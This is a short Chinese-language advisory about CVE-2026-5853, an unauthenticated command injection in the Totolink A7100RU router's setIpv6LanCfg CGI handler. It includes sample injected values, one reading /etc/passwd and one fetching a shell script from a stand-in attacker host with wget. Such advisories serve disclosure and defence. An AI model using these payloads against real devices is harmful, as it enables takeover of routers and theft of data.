CVE-2026-5853Totolink A7100RU路由器在固件版本7.4cu.2313_b20191024中存在严重的远程命令执行漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的setIpv6LanCfg函数未对传入的addrPrefixLen参数进行有效过滤。攻击者无需用户交互及身份认证,即可通过网络向目标设备发送特制数据包,触发操作系统命令注入。成功利用此漏洞可导致攻击者完全接管设备权限,获取敏感信息或中断网络服务,风险等级极高。
该漏洞的核心在于Totolink A7100RU路由器Web接口对用户输入的校验缺失。具体而言,CGI处理程序在处理setIpv6LanCfg请求时,直接将用户提交的addrPrefixLen参数拼接到系统命令中执行。由于缺乏对特殊字符(如分号、管道符等)的转义处理,攻击者可以构造恶意的Payload。利用过程通常涉及向/cgi-bin/cstecgi.cgi端点发送POST请求,并在JSON数据体中注入形如'; cat /etc/passwd'或'; wget http://evil.com/shell.sh'的命令。由于该服务通常以root权限运行,注入的命令将继承高权限执行。这使得攻击者能够读取设备配置、植入后门甚至破坏固件。结合CVSS向量(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H),该漏洞具有极高的可利用性和破坏力,属于典型的IoT设备远程代码执行(RCE)风险。